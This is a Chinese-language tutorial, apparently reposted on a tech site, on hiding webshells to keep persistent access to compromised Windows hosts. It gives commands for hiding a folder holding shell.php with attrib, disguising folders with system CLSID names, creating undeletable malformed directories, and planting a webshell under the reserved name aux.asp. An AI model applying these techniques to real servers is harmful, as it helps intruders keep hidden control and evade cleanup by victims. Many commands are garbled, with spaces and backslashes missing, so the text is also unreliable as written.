0x01 前言
当我们进行渗透测试的过程中,拿下来一台机器的权限,如果对这台主机做一个长久的控制,是我们要考虑的事情.所以通过本篇文章,我们旨在告诉大家,在Windows系统下的一些权限维持的方法,包括了webshell的维持和木马的可持续控制等等.
0x02 正文
2.1 隐藏文件夹隐藏Webshell
在我们进行渗透测试的过程中,如果拿到了一台Windows主机的Webshell,可以通过创建隐藏文件的形式,来将我们的webshell木马进行隐藏.典型命令如下:
attrib+s+a+h+r[目标文件夹]
这条命令的含义是将原本的文件夹添加了系统文件属性、存档文件属性、只读文件属性和隐藏文件属性
案例演示: 我们拿下了一台Windows主机的webshell,通过中国蚁剑我们连接上去,成功进入虚拟终端. 在一句话木马的当前目录下创建新文件夹,并写入新的木马,继而将含有木马的文件夹进行隐藏. 命令如下:
mkdirtmp#创建隐藏文件夹,此时尚未隐藏
cdtmp#进入创建的文件夹
echo^>>shell.php#写入Webshell至tmp目录下
cd../#返回上一级目录
attrib+s+a+h+rtmp#对创建的文件夹进行隐藏
此时受害者在自己的目录下是看不到我们创建的文件夹的(除非开启显示隐藏文件[默认不开启])
此时我们进行拼接,连接上我们的Webshell,发现成功连接.
2.2 利用系统代号隐藏Webshell
创建一个新建文件夹,将木马放入这个文件夹,重命名文件夹名称为"Computer.{20D04FE0-3AEA-1069-A2D8-08002B30309D}",此时会发现文件夹变成了我的电脑,双击进入的也是正常的我的电脑的页面
通过拼接文件夹名,使用中国蚁剑进行木马连接,例如
http://127.0.0.1/Computer.{20D04FE0-3AEA-1069-A2D8-08002B30309D}/shell.php
发现可以成功连接到Webshell里去.
类似的可用的特殊文件名的代号还有:
我的电脑.{20D04FE0-3AEA-1069-A2D8-08002B30309D}
回收站.{645ff040-5081-101b-9f08-00aa002f954e}
拔号网络.{992CFFA0-F557-101A-88EC-00DD010CCC48}
打印机.{2227a280-3aea-1069-a2de-08002b30309d}
控制面板.{21ec2020-3aea-1069-a2dd-08002b30309d}
网上邻居.{208D2C60-3AEA-1069-A2D7-08002B30309D}
2.3 畸形目录隐藏Webshell
首先在终端里创建一个畸形目录,命令如下
mkdira...
然后使用命令Copy命令将木马移动到畸形目录下,注意一定是命令行里移动的.
copyb.aspC:inetpubwwwroota....asp
此时访问进入a...文件夹下,发现不存在b.asp.
但是可以通过中国蚁剑连接上去
并且畸形目录无法被删除,也就是说除非是专业人员,此木马长久存在.
删除方法:使用如下命令可删除畸形目录
rd/s/q[畸形文件夹]
2.4 利用系统保留名制作不死Webshell
在Windows操作系统中,是不能以下形式创建文件的,比如aux,com1,com2,prn,con,nul等.但是在cmd目录下可以通过copy语句创建,这类文件无法在图形化界面被删除,只能在命令行中被删除. 创建不死Webshell命令如下:
copyb.txt\.C:inetpubwwwrootaux.asp
但是通过中国蚁剑可以正常连上
0x03 总结
本文总结了几种比较常见的Webshell隐藏方法,当然权限维持的方法并不局限于此,希望大家能够有所收获。
审核编辑 :李倩
-
木马
+关注
关注
0文章
47浏览量
13331 -
Shell
+关注
关注
1文章
365浏览量
23367
原文标题:Windows下木马隐藏小技巧
文章出处:【微信号:哆啦安全,微信公众号:哆啦安全】欢迎添加关注!文章转载请注明出处。
发布评论请先 登录
相关推荐
评论